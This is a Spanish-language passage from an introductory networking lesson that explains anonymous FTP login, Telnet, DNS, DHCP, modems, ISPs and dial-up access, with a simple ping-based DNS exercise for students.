Utiliza el comando open para conectarte al servidor. El comando: 
ftp> open <anon.server> 
conecta tu cliente ftp con el servidor anonymous ftp llamado anon.server. 
Cuando el servidor ftp remoto hace su conexión, se identificará a tu cliente local 
y luego pedirá un nombre de usuario. 
Connected to anon.server. 
220 ProFTPD Server (Welcome . . . ) 
User (anon.server
none)): 
Para la mayoría de servidores ftp anónimos, puedes entrar la palabra anonymous como 
nombre de usuario o username. El servidor ftp remoto reconocerá que te estás conectando 
como un usuario anónimo y te dará instrucciones sobre el código a utilizar como contraseña. 
331 Anonymous login ok, send your complete email address as your 
password. 

Password

En muchos casos, el servidor remoto no valida la dirección de correo entrada como 
contraseña, por lo que no te denegará el acceso al servidor aunque entres una 
dirección incorrecta. Después de introducir la contraseña, el servidor remoto enviará un 
mensaje de bienvenida a tu ordenador local. 
230- 
Welcome to ftp.anon.server, the public ftp server of anon.server. 
We hope you find what you're looking for. 
If you have any problems or questions, please send email to 
Thanks! 
230 Anonymous access granted, restrictions apply. 
Ahora, ya puedes utilizar los comandos ls, dir, cd y get para descargar ficheros desde 
el servidor remoto a tu ordenador local. 
Utilizando estos ejemplos, comprueba si puedes descargarte un fichero desde un servidor 
anonymous ftp. Utiliza tu navegador web y busca una herramienta para encontrar un servidor ftp anonymous que tenga una copia de "Alicia en el País de las Maravillas”; luego, 
utilizando el cliente ftp de línea de comandos (no tu navegador web) intenta descargarte el 
fichero. 

Telnet y SSH 

Telnet permite a un usuario local enviar una gran variedad de comandos a un ordenador 
remoto. Este hecho permite que el usuario local pueda dar instrucciones a la máquina 
remota para que realice ciertas funciones y devuelva los datos al ordenador local, casi 
como si se estuviera sentado delante del teclado del ordenador remoto. 
Tanto Windows como Linux disponen de un cliente telnet básico; para acceder a él, solo hay 
que abrir un prompt de comandos o una ventana de emulación de terminal y teclear: 
telnet. 
Para acceder a un servidor telnet, será necesario que el administrador del sistema te 
proporcione una cuenta y una contraseña, debido a que el programa telnet te permite 
realizar un gran número de acciones. Telnet se utilizaba en el pasado para que los 
administradores de sistema pudieran acceder y controlar remotamente los servidores, así 
como para proporcionar soporte a los usuarios a distancia. 
Telnet también se puede utilizar para otras muchas tareas como, por ejemplo, enviar y recibir 
correos electrónicos, ver el código fuente de páginas web,… aunque también hay que decir 
que telnet es una de las maneras más difíciles de conseguirlo y hay herramientas más fáciles 
para hacer estas mismas tareas. Telnet se puede utilizar para cometer muchas acciones 
ilegales e inmorales, pero también hay razones legítimas para utilizarlo. Puedes utilizar telnet 
para consultar tu correo electrónico y ver, no sólo el tema del correo, sino también las 
primeras líneas, lo que te facilitará decidir si borrar o no dicho correo sin tener que descargar 
todo el mensaje. 

DNS 

De la misma manera que cuando quieres llamar a un amigo necesitas saber su número de 
teléfono, cuando quieres conectarte a cierto ordenador remoto necesitas saber su 
identificación. Los ordenadores se identifican mediante las direcciones llamadas IP y es muy 
importante que no exista ninguna dirección duplicada, de la misma manera que no existen 
dos personas con el mismo número de teléfono. 
Las direcciones IP son números muy manejables para los ordenadores pero nosotros 
preferimos utilizar nombres. Por ejemplo, para acceder a la web de Enginyeria La Salle 
simplemente recordamos que su nombre es www.salleurl.edu. En cambio, nuestro ordenador 
también debe conocer qué dirección IP tiene el servidor web de Enginyeria La Salle. Así 
pues, los ordenadores deben conocer la equivalencia entre direcciones IP y nombres. Una 
posibilidad sería que tu ordenador almacenase la equivalencia nombre-dirección IP de 
todos los ordenadores del mundo, pero esto no es demasiado viable. 
Por ello se utiliza el protocolo DNS. DNS son las siglas de Domain Name Service y es el servicio 
que se encarga de traducir los nombres de dominio que conoces a las direcciones IP que 
necesita tu ordenador y viceversa. De esta manera, cuando tecleas el nombre 
www.nombrededominio.extension en tu navegador web, tu propio navegador contacta 
con el servidor DNS que tengas configurado en tu sistema (normalmente suele ser la dirección de tu propio ISP). Si tu ISP tiene ya la dirección IP correspondiente al nombre que le 
pides, se la envía a tu ordenador. Si no tiene hecha la resolución, el ISP hará una petición de 
búsqueda directamente a los servidores DNS del dominio o a los servidores raíz de la 
extensión, para obtener la dirección IP final. Cuando el ISP tenga la dirección, se la enviará a 
tu ordenador y así podrás acceder a la página web que habías solicitado. 

Ejercicios

Para profundizar sobre los conocimientos adquiridos de DNS: 
a. Accede a una ventana de MS-DOS. 
b. Identifica la dirección IP de tu máquina. ¿Qué comando has utilizado? ¿Qué 
dirección IP tienes? 
c. Identifica la dirección IP del servidor DNS que tienes configurado. ¿Qué comando 
has utilizado? ¿Qué dirección IP tiene el servidor DNS? 
d. Haz un ping a www.isecom.org . ¿Recibes una respuesta afirmativa? ¿Qué 
dirección IP contesta al ping? 
e. Entra en la configuración de red de tu ordenador y borra la dirección del servidor 
DNS que tengas configurada (te lo habías apuntado en el paso c, así que no hay 
problema). 
f. Vuelve a hacer un ping a www.isecom.org. ¿Recibes la misma respuesta que en 
el paso d? ¿Por qué? 
g. Haz un ping a la dirección IP que habías apuntado en el paso d. ¿Recibes la 
misma respuesta que en el paso d? ¿Por qué? 
h. Entra otra vez en la configuración de red de tu ordinador y configura la dirección 
del servidor DNS que tenías configurada previamente. Vuelve a hacer los pasos f y 
g. ¿Qué respuestas obtienes ahora? 

DHCP 

DHCP (Dynamic Host Configuration Protocol) es el protocolo de configuración dinámica de 
hosts. Tal como indica su nombre, este protocolo permite la configuración de los parámetros 
de red de las estaciones de manera dinámica. Esto es muy útil a la hora de configurar 
grandes redes de ordenadores, puesto que no hace falta configurar cada ordenador 
individualmente. Simplemente es necesario disponer de un servidor DHCP, donde se 
configuran los parámetros de red que se asignarán a los clientes. Cuando cada cliente se 
conecte a la red, lo primero que hará es pedirle los parámetros de configuración al servidor 
DHCP. A partir de entonces, el cliente ya tendrá toda la configuración de red actualizada 
para poder trabajar. 

Conexiones 

¿Qué son los módems y para qué sirven? Los módems trabajan a velocidades de 
bits/segundo. Una velocidad de transmisión alta es aconsejable, aunque también depende 
de la tarea a realizar. Hay ciertas aplicaciones, como por ejemplo la conexión a un servidor 
telnet, en las que también serviría un módem anticuado de hace más de veinte años que 
funcionase a una velocidad de 300 bits/segundo (suponiendo que tu velocidad de escribir 
con el teclado no fuese muy buena). Sin embargo, aplicaciones que necesitan mucho 
ancho de banda como por ejemplo, la transmisión de vídeo pueden llegar a colapsar 
incluso los cable modems más potentes. 

ISPs 

Realmente, cuando te conectas a Internet, no sólo estás llamando a Internet. Necesitas 
acceder a un servidor que conectará tu ordenador a Internet. Este servidor se encargará de 
hacer todo el trabajo duro, estando allí todo el tiempo. 
La presencia de un ISP en Internet es constante y tiene servidores donde se ejecutan los 
servicios que utilizarás. Entonces, tú mismo puedes ejecutar dichos servicios. Podrías disponer 
de un servidor de correo en tu propio ordenador local, pero esto requeriría que tu ordenador 
estuviera enchufado y conectado a la red durante todo el tiempo, simplemente esperando 
a aquellos instantes esporádicos de intercambio de información. Sin embargo, un ISP refuerza 
los esfuerzos de un gran número de usuarios, ya que el servidor de correo estará trabajando 
continuamente. Además, los ordenadores de los proveedores de servicios de Internet o ISPs, 
estarán conectados con otros ordenadores de Internet utilizando conexiones de alta 
velocidad. Los ordenadores de los ISPs utilizan conexiones de alta velocidad para conectarse 
a puntos de acceso de red, llamados NAP (Network Access Point). Además, dichos NAPs se 
interconectan utilizando conexiones de mucha más alta velocidad, que forman la columna 
vertebral de Internet. 

Servicio de telefonía tradicional 

El servicio de telefonía tradicional también es conocido como POTS (Plain Old Telephone 
Service) y todavía es el método más ampliamente utilizado para acceder a Internet. Su 
primer inconveniente es su baja velocidad, pero en muchos casos se utiliza este sistema 
debido a su amplia disponibilidad. La mayoría de proveedores de servicio de Internet tienen 
un gran número de números de acceso local. Y casi todo el mundo tiene una línea de 
teléfono en casa. En teoría, con un módem analógico y un bolsillo lleno de monedas, 
podrías conectarte desde casi cualquier cabina de teléfono pública. 
Pero el servicio de telefonía tradicional es lento. Los módems analógicos más rápidos 
funcionan a una velocidad de 56kbps. Pero este dato, en realidad, no es cierto del todo. Las 
restricciones de potencia limitan la velocidad máxima de bajada a 53kbps y, realmente, esta 
velocidad efectiva es mucho menor. 
Sin embargo, el servicio de telefonía está ampliamente disponible y los proveedores de 
servicios de Internet basados en acceso telefónico son bastante baratos e, incluso en 
algunas situaciones, proporcionan un acceso gratuito. No querrías comerciar con películas.